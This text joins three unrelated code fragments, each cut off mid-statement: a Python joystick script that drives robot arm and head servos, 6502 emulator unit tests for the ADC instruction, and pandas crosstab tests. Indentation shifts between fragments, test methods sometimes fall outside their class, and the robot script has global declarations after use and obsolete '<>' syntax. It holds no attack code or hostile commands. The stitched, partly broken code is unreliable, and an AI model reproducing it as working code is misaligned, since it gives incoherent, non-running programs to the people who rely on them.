test = (i01.leftArm.bicep.getPos() + 1)
test2 = ("%.0f"%test)
i01.leftArm.bicep.moveTo(int(float(test2)))
elif rightarm == 2:
if data.value > 0.2:
if data.value > rstest:
global rstest
rstest = data.value
global test
test = (i01.rightArm.shoulder.getPos() - 1)
test2 = ("%.0f"%test)
i01.rightArm.shoulder.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global rstest
rstest = 0
elif data.value < -0.2:
if data.value < rstest:
global rstest
rstest = data.value
global test
test = (i01.rightArm.shoulder.getPos() + 1)
test2 = ("%.0f"%test)
i01.rightArm.shoulder.moveTo(int(float(test2)))
if (data.id== "y"):
if arms == 0 or handshake == 1:
i01.setHeadSpeed(0.9, 0.9)
global Yval1
global Yval2
test = 180 - ((data.value + 1) * 90)
Yval1 = ("%.0f"%test)
if (Yval1 <> Yval2) :
Yval2 = Yval1
# print(Yval2)
i01.head.neck.moveTo(int(float(Yval2)))
i01.head.eyeY.moveTo(int(float(Yval2)))
elif arms == 1:
global test
test = 120 -((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.bicep.moveTo(int(float(test2)))
i01.leftArm.bicep.moveTo(int(float(test2)))
elif arms == 2:
if data.value > 0.2:
if data.value > rbtest:
global rbtest
rbtest = data.value
global test
test = (i01.rightArm.bicep.getPos() - 1)
test2 = ("%.0f"%test)
i01.rightArm.bicep.moveTo(int(float(test2)))
test = (i01.leftArm.bicep.getPos() - 1)
test2 = ("%.0f"%test)
i01.leftArm.bicep.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global rbtest
rbtest = 0
elif data.value < -0.2:
if data.value < rbtest:
global rbtest
rbtest = data.value
global test
test = (i01.rightArm.bicep.getPos() + 1)
test2 = ("%.0f"%test)
i01.rightArm.bicep.moveTo(int(float(test2)))
test = (i01.leftArm.bicep.getPos() + 1)
test2 = ("%.0f"%test)
i01.leftArm.bicep.moveTo(int(float(test2)))
elif leftarm == 1:
global test
test = 120 -((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.leftArm.shoulder.moveTo(int(float(test2)))
elif rightarm == 1:
global test
test = 120 -((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.bicep.moveTo(int(float(test2)))
elif leftarm == 2:
if data.value > 0.2:
if data.value > lstest:
global lstest
lstest = data.value
global test
test = (i01.leftArm.shoulder.getPos() - 1)
test2 = ("%.0f"%test)
i01.leftArm.shoulder.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global lstest
lstest = 0
elif data.value < -0.2:
if data.value < lstest:
global lstest
lstest = data.value
global test
test = (i01.leftArm.shoulder.getPos() + 1)
test2 = ("%.0f"%test)
i01.leftArm.shoulder.moveTo(int(float(test2)))
elif rightarm == 2:
if data.value > 0.2:
if data.value > rbtest:
global rbtest
rbtest = data.value
global test
test = (i01.rightArm.bicep.getPos() - 1)
test2 = ("%.0f"%test)
i01.rightArm.bicep.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global rbtest
rbtest = 0
elif data.value < -0.2:
if data.value < rbtest:
global rbtest
rbtest = | |
0x0000, (0x69, 0x00))
# mpu.step()
# self.assertEqual(0x0002, mpu.pc)
# self.assertEqual(0x76, mpu.a)
# self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# self.assertEqual(0, mpu.p & mpu.OVERFLOW)
# self.assertEqual(0, mpu.p & mpu.ZERO)
# self.assertEqual(0, mpu.p & mpu.CARRY)
# TODO: enable this once code supports invalid BCD operands
# def test_adc_bcd_on_immediate_9c_plus_9d(self):
# mpu = self._make_mpu()
# mpu.p |= mpu.DECIMAL
# mpu.p &= ~(mpu.CARRY)
# mpu.a = 0x9c
# # $0000 ADC #$9d
# # $0002 ADC #$9d
# self._write(mpu.memory, 0x0000, (0x69, 0x9d))
# self._write(mpu.memory, 0x0002, (0x69, 0x9d))
# mpu.step()
# self.assertEqual(0x9f, mpu.a)
# self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# mpu.step()
# self.assertEqual(0x0004, mpu.pc)
# self.assertEqual(0x93, mpu.a)
# self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
# self.assertEqual(0, mpu.p & mpu.ZERO)
# self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# ADC Absolute, X-Indexed
    def test_adc_bcd_off_abs_x_carry_clear_in_accumulator_zeroes(self):
        """ADC abs,X: 0x00 + 0x00, carry clear -> A=0x00; Z set, N/C clear."""
        mpu = self._make_mpu()
        mpu.a = 0x00
        mpu.x = 0x03
        # $0000 ADC $C000,X
        self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
        mpu.memory[0xC000 + mpu.x] = 0x00
        mpu.step()
        self.assertEqual(0x0003, mpu.pc)
        self.assertEqual(0x00, mpu.a)
        self.assertEqual(0, mpu.p & mpu.CARRY)
        self.assertEqual(0, mpu.p & mpu.NEGATIVE)
        self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
    def test_adc_bcd_off_abs_x_carry_set_in_accumulator_zero(self):
        """ADC abs,X: 0 + 0 with carry set -> A=0x01; incoming carry consumed."""
        mpu = self._make_mpu()
        mpu.a = 0
        mpu.x = 0x03
        mpu.p |= mpu.CARRY
        # $0000 ADC $C000,X
        self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
        mpu.memory[0xC000 + mpu.x] = 0x00
        mpu.step()
        self.assertEqual(0x0003, mpu.pc)
        self.assertEqual(0x01, mpu.a)
        self.assertEqual(0, mpu.p & mpu.NEGATIVE)
        self.assertEqual(0, mpu.p & mpu.ZERO)
        # The add must clear the carry it consumed
        self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
    def test_adc_bcd_off_abs_x_carry_clear_in_no_carry_clear_out(self):
        """ADC abs,X: 0x01 + 0xFE = 0xFF; N set, no carry out, not zero."""
        mpu = self._make_mpu()
        mpu.a = 0x01
        mpu.x = 0x03
        # $0000 ADC $C000,X
        self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
        mpu.memory[0xC000 + mpu.x] = 0xFE
        mpu.step()
        self.assertEqual(0x0003, mpu.pc)
        self.assertEqual(0xFF, mpu.a)
        self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
        self.assertEqual(0, mpu.p & mpu.CARRY)
        self.assertEqual(0, mpu.p & mpu.ZERO)
    def test_adc_bcd_off_abs_x_carry_clear_in_carry_set_out(self):
        """ADC abs,X: 0x02 + 0xFF wraps to 0x01 and sets the carry out."""
        mpu = self._make_mpu()
        mpu.a = 0x02
        mpu.x = 0x03
        # $0000 ADC $C000,X
        self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
        mpu.memory[0xC000 + mpu.x] = 0xFF
        mpu.step()
        self.assertEqual(0x0003, mpu.pc)
        self.assertEqual(0x01, mpu.a)
        self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
        self.assertEqual(0, mpu.p & mpu.NEGATIVE)
        self.assertEqual(0, mpu.p & mpu.ZERO)
    def test_adc_bcd_off_abs_x_overflow_clr_no_carry_01_plus_01(self):
        """ADC abs,X: 0x01 + 0x01 = 0x02; no signed overflow (V clear)."""
        mpu = self._make_mpu()
        mpu.p &= ~(mpu.CARRY)
        mpu.a = 0x01
        # NOTE(review): mpu.x is never set here; relies on _make_mpu()
        # leaving x at a known value (presumably 0) -- confirm.
        # $0000 ADC $C000,X
        self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
        mpu.memory[0xC000 + mpu.x] = 0x01
        mpu.step()
        self.assertEqual(0x0003, mpu.pc)
        self.assertEqual(0x02, mpu.a)
        self.assertEqual(0, mpu.p & mpu.OVERFLOW)
    def test_adc_bcd_off_abs_x_overflow_clr_no_carry_01_plus_ff(self):
        """ADC abs,X: 0x01 + 0xFF wraps to 0x00; no signed overflow."""
        mpu = self._make_mpu()
        mpu.p &= ~(mpu.CARRY)
        mpu.a = 0x01
        # NOTE(review): mpu.x is never set here; relies on _make_mpu()
        # leaving x at a known value (presumably 0) -- confirm.
        # $0000 ADC $C000,X
        self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
        mpu.memory[0xC000 + mpu.x] = 0xff
        mpu.step()
        self.assertEqual(0x0003, mpu.pc)
        self.assertEqual(0x00, mpu.a)
        self.assertEqual(0, mpu.p & mpu.OVERFLOW)
    def test_adc_bcd_off_abs_x_overflow_set_no_carry_7f_plus_01(self):
        """ADC abs,X: 0x7F + 0x01 = 0x80; positive overflow sets V."""
        mpu = self._make_mpu()
        mpu.p &= ~(mpu.CARRY)
        mpu.a = 0x7f
        # NOTE(review): mpu.x is never set here; relies on _make_mpu()
        # leaving x at a known value (presumably 0) -- confirm.
        # $0000 ADC $C000,X
        self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
        mpu.memory[0xC000 + mpu.x] = 0x01
        mpu.step()
        self.assertEqual(0x0003, mpu.pc)
        self.assertEqual(0x80, mpu.a)
        self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
    def test_adc_bcd_off_abs_x_overflow_set_no_carry_80_plus_ff(self):
        """ADC abs,X: 0x80 + 0xFF = 0x7F; negative overflow sets V."""
        mpu = self._make_mpu()
        mpu.p &= ~(mpu.CARRY)
        mpu.a = 0x80
        # NOTE(review): mpu.x is never set here; relies on _make_mpu()
        # leaving x at a known value (presumably 0) -- confirm.
        # $0000 ADC $C000,X
        self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
        mpu.memory[0xC000 + mpu.x] = 0xff
        mpu.step()
        self.assertEqual(0x0003, mpu.pc)
        self.assertEqual(0x7f, mpu.a)
        self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
    def test_adc_bcd_off_abs_x_overflow_set_on_40_plus_40(self):
        """ADC abs,X: 0x40 + 0x40 = 0x80; sets N and V, clears Z."""
        mpu = self._make_mpu()
        mpu.p &= ~(mpu.OVERFLOW)
        mpu.a = 0x40
        mpu.x = 0x03
        # $0000 ADC $C000,X
        self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
        mpu.memory[0xC000 + mpu.x] = 0x40
        mpu.step()
        self.assertEqual(0x0003, mpu.pc)
        self.assertEqual(0x80, mpu.a)
        self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
        self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
        self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Absolute, Y-Indexed
    def test_adc_bcd_off_abs_y_carry_clear_in_accumulator_zeroes(self):
        """ADC abs,Y: 0x00 + 0x00, carry clear -> A=0x00; Z set, N/C clear."""
        mpu = self._make_mpu()
        mpu.a = 0x00
        mpu.y = 0x03
        # $0000 ADC $C000,Y
        self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
        mpu.memory[0xC000 + mpu.y] = 0x00
        mpu.step()
        self.assertEqual(0x0003, mpu.pc)
        self.assertEqual(0x00, mpu.a)
        self.assertEqual(0, mpu.p & mpu.CARRY)
        self.assertEqual(0, mpu.p & mpu.NEGATIVE)
        self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
    def test_adc_bcd_off_abs_y_carry_set_in_accumulator_zero(self):
        """ADC abs,Y: 0 + 0 with carry set -> A=0x01; incoming carry consumed."""
        mpu = self._make_mpu()
        mpu.a = 0
        mpu.y = 0x03
        mpu.p |= mpu.CARRY
        # $0000 ADC $C000,Y
        self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
        mpu.memory[0xC000 + mpu.y] = 0x00
        mpu.step()
        self.assertEqual(0x0003, mpu.pc)
        self.assertEqual(0x01, mpu.a)
        self.assertEqual(0, mpu.p & mpu.NEGATIVE)
        self.assertEqual(0, mpu.p & mpu.ZERO)
        # The add must clear the carry it consumed
        self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
    def test_adc_bcd_off_abs_y_carry_clear_in_no_carry_clear_out(self):
        """ADC abs,Y: 0x01 + 0xFE = 0xFF; N set, no carry out, not zero."""
        mpu = self._make_mpu()
        mpu.a = 0x01
        mpu.y = 0x03
        # $0000 ADC $C000,Y
        self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
        mpu.memory[0xC000 + mpu.y] = 0xFE
        mpu.step()
        self.assertEqual(0x0003, mpu.pc)
        self.assertEqual(0xFF, mpu.a)
        self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
        self.assertEqual(0, mpu.p & mpu.CARRY)
        self.assertEqual(0, mpu.p & mpu.ZERO)
    def test_adc_bcd_off_abs_y_carry_clear_in_carry_set_out(self):
        """ADC abs,Y: 0x02 + 0xFF wraps to 0x01 and sets the carry out."""
        mpu = self._make_mpu()
        mpu.a = 0x02
        mpu.y = 0x03
        # $0000 ADC $C000,Y
        self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
        mpu.memory[0xC000 + mpu.y] = 0xFF
        mpu.step()
        self.assertEqual(0x0003, mpu.pc)
        self.assertEqual(0x01, mpu.a)
        self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
        self.assertEqual(0, mpu.p & mpu.NEGATIVE)
        self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_y_overflow_clr_no_carry_01_plus_01(self):
    """ADC $C000,Y: $01 + $01 = $02 with no signed overflow (V clear)."""
    mpu = self._make_mpu()
    mpu.p &= ~(mpu.CARRY)
    mpu.a = 0x01
    # Set Y so the Y-indexed addressing mode is actually exercised;
    # previously Y defaulted to 0, which made this identical to plain
    # absolute addressing.  Matches the sibling abs_y tests.
    mpu.y = 0x03
    # $0000 ADC $C000,Y
    self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
    mpu.memory[0xC000 + mpu.y] = 0x01
    mpu.step()
    self.assertEqual(0x0003, mpu.pc)
    self.assertEqual(0x02, mpu.a)
    self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_clr_no_carry_01_plus_ff(self):
    """ADC $C000,Y: $01 + $FF = $00 with no signed overflow (V clear)."""
    mpu = self._make_mpu()
    mpu.p &= ~(mpu.CARRY)
    mpu.a = 0x01
    # Set Y so the Y-indexed addressing mode is actually exercised
    # (previously Y defaulted to 0); matches the sibling abs_y tests.
    mpu.y = 0x03
    # $0000 ADC $C000,Y
    self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
    mpu.memory[0xC000 + mpu.y] = 0xFF
    mpu.step()
    self.assertEqual(0x0003, mpu.pc)
    self.assertEqual(0x00, mpu.a)
    self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_set_no_carry_7f_plus_01(self):
    """ADC $C000,Y: $7F + $01 = $80 sets the signed-overflow flag."""
    mpu = self._make_mpu()
    mpu.p &= ~(mpu.CARRY)
    mpu.a = 0x7f
    # Set Y so the Y-indexed addressing mode is actually exercised
    # (previously Y defaulted to 0); matches the sibling abs_y tests.
    mpu.y = 0x03
    # $0000 ADC $C000,Y
    self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
    mpu.memory[0xC000 + mpu.y] = 0x01
    mpu.step()
    self.assertEqual(0x0003, mpu.pc)
    self.assertEqual(0x80, mpu.a)
    self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_set_no_carry_80_plus_ff(self):
    """ADC $C000,Y: $80 + $FF = $7F sets the signed-overflow flag."""
    mpu = self._make_mpu()
    mpu.p &= ~(mpu.CARRY)
    mpu.a = 0x80
    # Set Y so the Y-indexed addressing mode is actually exercised
    # (previously Y defaulted to 0); matches the sibling abs_y tests.
    mpu.y = 0x03
    # $0000 ADC $C000,Y
    self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
    mpu.memory[0xC000 + mpu.y] = 0xFF
    mpu.step()
    self.assertEqual(0x0003, mpu.pc)
    self.assertEqual(0x7f, mpu.a)
    self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_set_on_40_plus_40(self):
    """ADC $C000,Y: $40 + $40 = $80 flips the sign -> V and N both set."""
    cpu = self._make_mpu()
    cpu.p &= ~(cpu.OVERFLOW)
    cpu.a = 0x40
    cpu.y = 0x03
    # $0000 ADC $C000,Y
    self._write(cpu.memory, 0x0000, (0x79, 0x00, 0xC0))
    cpu.memory[0xC000 + cpu.y] = 0x40
    cpu.step()
    self.assertEqual(0x0003, cpu.pc)
    self.assertEqual(0x80, cpu.a)
    self.assertEqual(cpu.OVERFLOW, cpu.p & cpu.OVERFLOW)
    self.assertEqual(cpu.NEGATIVE, cpu.p & cpu.NEGATIVE)
    self.assertEqual(0, cpu.p & cpu.ZERO)
# ADC Zero Page, X-Indexed
def test_adc_bcd_off_zp_x_carry_clear_in_accumulator_zeroes(self):
    """ADC $0010,X: 0 + 0 with carry clear leaves A=0 and sets only Z."""
    cpu = self._make_mpu()
    cpu.a = 0x00
    cpu.x = 0x03
    # $0000 ADC $0010,X
    self._write(cpu.memory, 0x0000, (0x75, 0x10))
    cpu.memory[0x0010 + cpu.x] = 0x00
    cpu.step()
    self.assertEqual(0x0002, cpu.pc)
    self.assertEqual(0x00, cpu.a)
    self.assertEqual(cpu.ZERO, cpu.p & cpu.ZERO)
    self.assertEqual(0, cpu.p & cpu.NEGATIVE)
    self.assertEqual(0, cpu.p & cpu.CARRY)
def test_adc_bcd_off_zp_x_carry_set_in_accumulator_zero(self):
    """ADC $0010,X: 0 + 0 with carry set -> $01; C, N and Z all clear."""
    mpu = self._make_mpu()
    mpu.a = 0
    mpu.x = 0x03
    mpu.p |= mpu.CARRY
    # $0000 ADC $0010,X
    self._write(mpu.memory, 0x0000, (0x75, 0x10))
    mpu.memory[0x0010 + mpu.x] = 0x00
    mpu.step()
    self.assertEqual(0x0002, mpu.pc)
    self.assertEqual(0x01, mpu.a)
    self.assertEqual(0, mpu.p & mpu.NEGATIVE)
    self.assertEqual(0, mpu.p & mpu.ZERO)
    # Assert the carry bit is clear directly, consistent with the other
    # ADC tests, rather than via the weaker assertNotEqual form.
    self.assertEqual(0, mpu.p & mpu.CARRY)
def test_adc_bcd_off_zp_x_carry_clear_in_no_carry_clear_out(self):
    """ADC $0010,X: $01 + $FE = $FF; N set, no carry out."""
    cpu = self._make_mpu()
    cpu.a = 0x01
    cpu.x = 0x03
    # $0000 ADC $0010,X
    self._write(cpu.memory, 0x0000, (0x75, 0x10))
    cpu.memory[0x0010 + cpu.x] = 0xFE
    cpu.step()
    self.assertEqual(0x0002, cpu.pc)
    self.assertEqual(0xFF, cpu.a)
    self.assertEqual(cpu.NEGATIVE, cpu.p & cpu.NEGATIVE)
    self.assertEqual(0, cpu.p & cpu.ZERO)
    self.assertEqual(0, cpu.p & cpu.CARRY)
def test_adc_bcd_off_zp_x_carry_clear_in_carry_set_out(self):
    """ADC $0010,X: $02 + $FF wraps to $01 and sets the carry."""
    cpu = self._make_mpu()
    cpu.a = 0x02
    cpu.x = 0x03
    # $0000 ADC $0010,X
    self._write(cpu.memory, 0x0000, (0x75, 0x10))
    cpu.memory[0x0010 + cpu.x] = 0xFF
    cpu.step()
    self.assertEqual(0x0002, cpu.pc)
    self.assertEqual(0x01, cpu.a)
    self.assertEqual(cpu.CARRY, cpu.p & cpu.CARRY)
    self.assertEqual(0, cpu.p & cpu.ZERO)
    self.assertEqual(0, cpu.p & cpu.NEGATIVE)
def test_adc_bcd_off_zp_x_overflow_clr_no_carry_01_plus_01(self):
    """ADC $0010,X: $01 + $01 = $02 with no signed overflow."""
    cpu = self._make_mpu()
    cpu.p &= ~(cpu.CARRY)
    cpu.a = 0x01
    cpu.x = 0x03
    # $0000 ADC $0010,X
    self._write(cpu.memory, 0x0000, (0x75, 0x10))
    cpu.memory[0x0010 + cpu.x] = 0x01
    cpu.step()
    self.assertEqual(0x0002, cpu.pc)
    self.assertEqual(0x02, cpu.a)
    self.assertEqual(0, cpu.p & cpu.OVERFLOW)
def test_adc_bcd_off_zp_x_overflow_clr_no_carry_01_plus_ff(self):
    """ADC $0010,X: $01 + $FF = $00 with no signed overflow."""
    cpu = self._make_mpu()
    cpu.p &= ~(cpu.CARRY)
    cpu.a = 0x01
    cpu.x = 0x03
    # $0000 ADC $0010,X
    self._write(cpu.memory, 0x0000, (0x75, 0x10))
    cpu.memory[0x0010 + cpu.x] = 0xFF
    cpu.step()
    self.assertEqual(0x0002, cpu.pc)
    self.assertEqual(0x00, cpu.a)
    self.assertEqual(0, cpu.p & cpu.OVERFLOW)
def test_adc_bcd_off_zp_x_overflow_set_no_carry_7f_plus_01(self):
    """ADC $0010,X: $7F + $01 = $80 sets the signed-overflow flag."""
    cpu = self._make_mpu()
    cpu.p &= ~(cpu.CARRY)
    cpu.a = 0x7f
    cpu.x = 0x03
    # $0000 ADC $0010,X
    self._write(cpu.memory, 0x0000, (0x75, 0x10))
    cpu.memory[0x0010 + cpu.x] = 0x01
    cpu.step()
    self.assertEqual(0x0002, cpu.pc)
    self.assertEqual(0x80, cpu.a)
    self.assertEqual(cpu.OVERFLOW, cpu.p & cpu.OVERFLOW)
def test_adc_bcd_off_zp_x_overflow_set_no_carry_80_plus_ff(self):
    """ADC $0010,X: $80 + $FF = $7F sets the signed-overflow flag."""
    cpu = self._make_mpu()
    cpu.p &= ~(cpu.CARRY)
    cpu.a = 0x80
    cpu.x = 0x03
    # $0000 ADC $0010,X
    self._write(cpu.memory, 0x0000, (0x75, 0x10))
    cpu.memory[0x0010 + cpu.x] = 0xFF
    cpu.step()
    self.assertEqual(0x0002, cpu.pc)
    self.assertEqual(0x7F, cpu.a)
    self.assertEqual(cpu.OVERFLOW, cpu.p & cpu.OVERFLOW)
def test_adc_bcd_off_zp_x_overflow_set_on_40_plus_40(self):
    """ADC $0010,X: $40 + $40 = $80 flips the sign -> V and N both set."""
    cpu = self._make_mpu()
    cpu.p &= ~(cpu.OVERFLOW)
    cpu.a = 0x40
    cpu.x = 0x03
    # $0000 ADC $0010,X
    self._write(cpu.memory, 0x0000, (0x75, 0x10))
    cpu.memory[0x0010 + cpu.x] = 0x40
    cpu.step()
    self.assertEqual(0x0002, cpu.pc)
    self.assertEqual(0x80, cpu.a)
    self.assertEqual(cpu.OVERFLOW, cpu.p & cpu.OVERFLOW)
    self.assertEqual(cpu.NEGATIVE, cpu.p & cpu.NEGATIVE)
    self.assertEqual(0, cpu.p & cpu.ZERO)
# ADC Indirect, Indexed (X)
def test_adc_bcd_off_ind_indexed_carry_clear_in_accumulator_zeroes(self):
    """ADC ($0010,X): 0 + 0 with carry clear leaves A=0 and sets only Z."""
    cpu = self._make_mpu()
    cpu.a = 0x00
    cpu.x = 0x03
    # $0000 ADC ($0010,X)
    # $0013 Vector to $ABCD
    self._write(cpu.memory, 0x0000, (0x61, 0x10))
    self._write(cpu.memory, 0x0013, (0xCD, 0xAB))
    cpu.memory[0xABCD] = 0x00
    cpu.step()
    self.assertEqual(0x0002, cpu.pc)
    self.assertEqual(0x00, cpu.a)
    self.assertEqual(cpu.ZERO, cpu.p & cpu.ZERO)
    self.assertEqual(0, cpu.p & cpu.NEGATIVE)
    self.assertEqual(0, cpu.p & cpu.CARRY)
def test_adc_bcd_off_ind_indexed_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.x = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
mpu.memory[0xABCD] = 0x00
mpu.step()
self.assertEqual(0x0002, mpu.pc)
| |
[np.array([1, 1, 2, 2]), np.array([1, 2, 1, 2])], np.array([1, 2, 1, 2])
)
# Test with aggfunc
norm_counts = DataFrame(
[[0.25, 0, 0.25], [0.25, 0.5, 0.75], [0.5, 0.5, 1]],
index=Index([1, 2, "All"], name="a", dtype="object"),
columns=Index([3, 4, "All"], name="b"),
)
test_case = crosstab(
df.a, df.b, df.c, aggfunc="count", normalize="all", margins=True
)
tm.assert_frame_equal(test_case, norm_counts)
df = DataFrame(
{"a": [1, 2, 2, 2, 2], "b": [3, 3, 4, 4, 4], "c": [0, 4, np.nan, 3, 3]}
)
norm_sum = DataFrame(
[[0, 0, 0.0], [0.4, 0.6, 1], [0.4, 0.6, 1]],
index=Index([1, 2, "All"], name="a", dtype="object"),
columns=Index([3, 4, "All"], name="b", dtype="object"),
)
test_case = crosstab(
df.a, df.b, df.c, aggfunc=np.sum, normalize="all", margins=True
)
tm.assert_frame_equal(test_case, norm_sum)
def test_crosstab_with_empties(self):
# Check handling of empties
df = DataFrame(
{
"a": [1, 2, 2, 2, 2],
"b": [3, 3, 4, 4, 4],
"c": [np.nan, np.nan, np.nan, np.nan, np.nan],
}
)
empty = DataFrame(
[[0.0, 0.0], [0.0, 0.0]],
index=Index([1, 2], name="a", dtype="int64"),
columns=Index([3, 4], name="b"),
)
for i in [True, "index", "columns"]:
calculated = crosstab(df.a, df.b, values=df.c, aggfunc="count", normalize=i)
tm.assert_frame_equal(empty, calculated)
nans = DataFrame(
[[0.0, np.nan], [0.0, 0.0]],
index=Index([1, 2], name="a", dtype="int64"),
columns=Index([3, 4], name="b"),
)
calculated = crosstab(df.a, df.b, values=df.c, aggfunc="count", normalize=False)
tm.assert_frame_equal(nans, calculated)
def test_crosstab_errors(self):
    """Issue 12578: invalid argument combinations raise ValueError."""
    frame = DataFrame(
        {"a": [1, 2, 2, 2, 2], "b": [3, 3, 4, 4, 4], "c": [1, 1, np.nan, 1, 1]}
    )
    msg = "values cannot be used without an aggfunc."
    with pytest.raises(ValueError, match=msg):
        crosstab(frame.a, frame.b, values=frame.c)
    msg = "aggfunc cannot be used without values"
    with pytest.raises(ValueError, match=msg):
        crosstab(frame.a, frame.b, aggfunc=np.mean)
    msg = "Not a valid normalize argument"
    for bad_norm in ("42", 42):
        with pytest.raises(ValueError, match=msg):
            crosstab(frame.a, frame.b, normalize=bad_norm)
    msg = "Not a valid margins argument"
    with pytest.raises(ValueError, match=msg):
        crosstab(frame.a, frame.b, normalize="all", margins=42)
def test_crosstab_with_categorial_columns(self):
# GH 8860
df = DataFrame(
{
"MAKE": ["Honda", "Acura", "Tesla", "Honda", "Honda", "Acura"],
"MODEL": ["Sedan", "Sedan", "Electric", "Pickup", "Sedan", "Sedan"],
}
)
categories = ["Sedan", "Electric", "Pickup"]
df["MODEL"] = df["MODEL"].astype("category").cat.set_categories(categories)
result = crosstab(df["MAKE"], df["MODEL"])
expected_index = Index(["Acura", "Honda", "Tesla"], name="MAKE")
expected_columns = CategoricalIndex(
categories, categories=categories, ordered=False, name="MODEL"
)
expected_data = [[2, 0, 0], [2, 0, 1], [0, 1, 0]]
expected = DataFrame(
expected_data, index=expected_index, columns=expected_columns
)
tm.assert_frame_equal(result, expected)
def test_crosstab_with_numpy_size(self):
    # GH 4003
    # Crosstab with margins=True and np.size as the aggfunc: each cell
    # holds the group size, margins hold per-row/column totals, and a
    # NaN marks an (A, B, C) combination that never occurs.
    df = DataFrame(
        {
            "A": ["one", "one", "two", "three"] * 6,
            "B": ["A", "B", "C"] * 8,
            "C": ["foo", "foo", "foo", "bar", "bar", "bar"] * 4,
            # D/E values are irrelevant to np.size; only group sizes count.
            "D": np.random.randn(24),
            "E": np.random.randn(24),
        }
    )
    result = crosstab(
        index=[df["A"], df["B"]],
        columns=[df["C"]],
        margins=True,
        aggfunc=np.size,
        values=df["D"],
    )
    # Rows: (A, B) MultiIndex with a trailing ("All", "") margin row;
    # columns: the C values plus an "All" margin column.
    expected_index = MultiIndex(
        levels=[["All", "one", "three", "two"], ["", "A", "B", "C"]],
        codes=[[1, 1, 1, 2, 2, 2, 3, 3, 3, 0], [1, 2, 3, 1, 2, 3, 1, 2, 3, 0]],
        names=["A", "B"],
    )
    expected_column = Index(["bar", "foo", "All"], dtype="object", name="C")
    expected_data = np.array(
        [
            [2.0, 2.0, 4.0],
            [2.0, 2.0, 4.0],
            [2.0, 2.0, 4.0],
            [2.0, np.nan, 2.0],
            [np.nan, 2.0, 2.0],
            [2.0, np.nan, 2.0],
            [np.nan, 2.0, 2.0],
            [2.0, np.nan, 2.0],
            [np.nan, 2.0, 2.0],
            [12.0, 12.0, 24.0],
        ]
    )
    expected = DataFrame(
        expected_data, index=expected_index, columns=expected_column
    )
    tm.assert_frame_equal(result, expected)
def test_crosstab_duplicate_names(self):
# GH 13279 / 22529
s1 = Series(range(3), name="foo")
s2_foo = Series(range(1, 4), name="foo")
s2_bar = Series(range(1, 4), name="bar")
s3 = Series(range(3), name="waldo")
# check result computed with duplicate labels against
# result computed with unique labels, then relabelled
mapper = {"bar": "foo"}
# duplicate row, column labels
result = crosstab(s1, s2_foo)
expected = crosstab(s1, s2_bar).rename_axis(columns=mapper, axis=1)
tm.assert_frame_equal(result, expected)
# duplicate row, unique column labels
result = crosstab([s1, s2_foo], s3)
expected = crosstab([s1, s2_bar], s3).rename_axis(index=mapper, axis=0)
tm.assert_frame_equal(result, expected)
# unique row, duplicate column labels
result = crosstab(s3, [s1, s2_foo])
expected = crosstab(s3, [s1, s2_bar]).rename_axis(columns=mapper, axis=1)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("names", [["a", ("b", "c")], [("a", "b"), "c"]])
def test_crosstab_tuple_name(self, names):
    """Tuple-valued Series names survive into the crosstab axes."""
    rows = Series(range(3), name=names[0])
